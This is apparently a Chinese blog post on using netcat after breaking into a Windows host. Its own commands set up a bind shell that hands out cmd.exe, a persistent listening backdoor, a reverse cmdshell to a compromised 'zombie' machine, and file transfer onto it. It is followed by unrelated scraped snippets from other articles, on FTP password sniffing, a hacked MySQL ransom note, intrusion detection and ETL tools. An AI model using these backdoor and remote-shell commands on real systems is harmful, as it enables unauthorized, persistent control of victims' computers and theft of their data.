黑客入侵利器,nc实战(Windows版本)

入侵主机后,利用nc的一些方法

Tip:软件下载地址-------http://down.51cto.com/data/1982508

1.端口监听,可配合sfind使用

sfind -p port ip 来测试该端口本地是否可监听;

nc -vv -l -p port 监听端口port的通信;

2.搭建简单的远程shell

远程主机运行 nc -l -p port -t -e cmd.exe (-t:以telnet形式连接 -e:程序定向)

本机以telnet remote-ip_address port 即可直接登陆

3.长期后门的建立

远程主机运行 nc -l -p port -L -d cmd.exe;其他同2;

4.反向连接,远程绑定cmdshell

local ip:192.168.1.6 remote ip:192.168.72.143

把远程主机的cmdshell绑定到本机ip的某个端口;

本地监听绑定的端口,自动连接到远程主机(肉鸡);

5.建立数据管道,传输文件;

肉鸡开始监听port,结果输出到某个文件;

本地读取要传输的文件,传输到相应的端口;

成功发送,简单实惠;

6.其他功能,比如做蜜罐,抢占系统服务端口,扫描端口等;有其他更好的软件可用,后续会写~

时间: 2024-11-05 21:51:23

黑客入侵利器,nc实战(Windows版本)的相关文章

浅议FTP在黑客入侵中的作用

小贴纸:先说下FTP传输时密码是明文,可以用wireshark捕获,方法如下图: 过滤为:ftp protocol,apply,即可在length info中看见ftp用户名,密码(这里不细说,很简单). ===============下面进入正文================= 通过ftp匿名登录入侵主机后,需要上传工具到肉鸡,有时候只能在DOS环境下操作,这时候ftp显得较为方便:一般来说,ftp传输时bin模式比ascii模式传输快:如下图,我们上传了nc到肉鸡上,然后利用前面文章说过的

(转)ETL利器Kettle实战应用解析系列一【Kettle使用介绍】

原文地址:http://www.cnblogs.com/limengqiang/archive/2013/01/16/KettleApply1.html 本系列文章主要索引如下: 一.ETL利器Kettle实战应用解析系列一[Kettle使用介绍] 二.ETL利器Kettle实战应用解析系列二 [应用场景和实战DEMO下载] 三.ETL利器Kettle实战应用解析系列三 [ETL后台进程执行配置方式] 本文主要阅读目录如下: 1.Kettle概念 2.下载和部署 3.Kettle环境配置 4.K

六:入侵检测技术实战

入侵检测技术可实时监控网络传输,自动检测可疑行为,分析来自网络外部入侵信号和内部的非法活动,在系统受到危害前发出警告,对攻击做出实时的响应,并提供补救措施,最大程度地保障系统安全. 6.1 入侵检测概述 所谓入侵检测是指试图监视和尽可能阻止有害信息的入侵,或其他能够对用户的系统和网络资源产生危害的行为.简单地 说,它是这样工作的:用户有一个计算机系统,它与网络连接着,也许也同互联网连接.由于一些原因,允许网络上的授权用户访问该计算机.比如说,有一个连接 着互联网的Web服务器,允许自己的客户.员

ETL利器Kettle实战应用解析系列一【Kettle使用介绍】

本系列文章主要索引如下: 一.ETL利器Kettle实战应用解析系列一[Kettle使用介绍] 二.ETL利器Kettle实战应用解析系列二 [应用场景和实战DEMO下载] 三.ETL利器Kettle实战应用解析系列三 [ETL后台进程执行配置方式] 本文主要阅读目录如下: 1.Kettle概念 2.下载和部署 3.Kettle环境配置 4.Kettle使用及组件介绍 ETL(Extract-Transform-Load的缩写,即数据抽取.转换.装载的过程),对于企业或行业应用来说,我们经常会遇

快速自检电脑是否被黑客入侵过(Linux版)

之前写了一篇快速自检电脑是否被黑客入侵过(Windows版), 这次就来写写Linux版本的. 前言 严谨地说, Linux只是一个内核, GNU Linux才算完整的操作系统, 但在本文里还是用通俗的叫法, 把Ubuntu,Debian,RedHat,CentOS,ArchLinux等发行版都统称为Linux. 本文里所说的方法不仅对Linux的发行版适用, 部分方法对Mac OSX操作系统也是适用的. 异常的帐号和权限 如果黑客曾经获得过命令运行的机会, 对方往往会想要将这个机会持续下去,

Mysql被黑客入侵及安全措施总结

情况概述 今天登陆在腾讯云服务器上搭建的 MySQL 数据库,发现数据库被黑了,黑客提示十分明显. MySQL 中只剩下两个数据库,一个是information_schema,另一个是黑客创建的PLEASE_READ,其中有一张info表,内容如下: Info: Your DB is Backed up at our servers, to restore send 0.2 BTC to the Bitcoin Address then send an email with your serve

防御黑客入侵的小妙招

冒名的购物网站也非常多,据统计显示钓鱼网站一年钓走网民的损失达到76亿.网上的一些虚假宣传也非常多,哈尔滨消协人士接到的投诉就达到375件这样的形势妨碍互联网发展的. 网络安全问题,成为中小站长迫切需要警惕的事情.那么如何让自己的网站不被黑客入侵呢?怎样保护网络安全呢? 下面跟大家分享一下抵御黑客入侵的小妙招: 防火墙,检查,再检查 最后一个技巧是仔细检查防火墙的设置.防火墙是网络规划中很重要的一部份,因为它能使公司电脑不受外界恶意破坏. 首先,不要公布非必要的IP地址.你至少要有一个对外的IP

实验十:黑客入侵技术基本流程

说明:警告!警告!警告! 如果因个人学习后作出对社会造成危害或者经济损失的,本人概不负责,我只是提供一个学习的平台,我只是一个引路人,真正能否是否掌握这门技术需要看个人的造化,但是学习后千万不要用来做一些对社会造成危害的事情,一切责任后果都由当事人自己承担,好奇是会害死猫的,千万不要用来干坏事!千万不要用来干坏事!千万不要用来干坏事!仅仅学习参考!!! 这些都是依靠工具手段实现的实验一:扫描器的使用 实验二:字典攻击的使用 实验三:bluesky的使用 实验四:提权 实验五:清除日志 实验六:嗅

使用的阿里云服务器被黑客入侵怎么办

对于很多运维人员来说,服务器安全是至关重要的,必须确保云服务器上的网站不被恶意入侵以及安装木马病毒程序.现在很多公司以及个人习惯使用云服务器,如阿里云.腾讯云.百度云等,当云服务器被黑客入侵的时候,排查的相关方法依旧跟自建服务器类似.如果使用的是阿里云服务器,在网站等应用程序被挂马蠕虫或者服务器被入侵,但自身运维工作人员又无法排查出问题的时候,我们还可以通过购买阿里云的安全应急响应服务来请阿里的安全应急专家帮助我们运维人员排查. 自身运维人员排查涉及的方面如下,具体不详细阐述: (1)查看日志信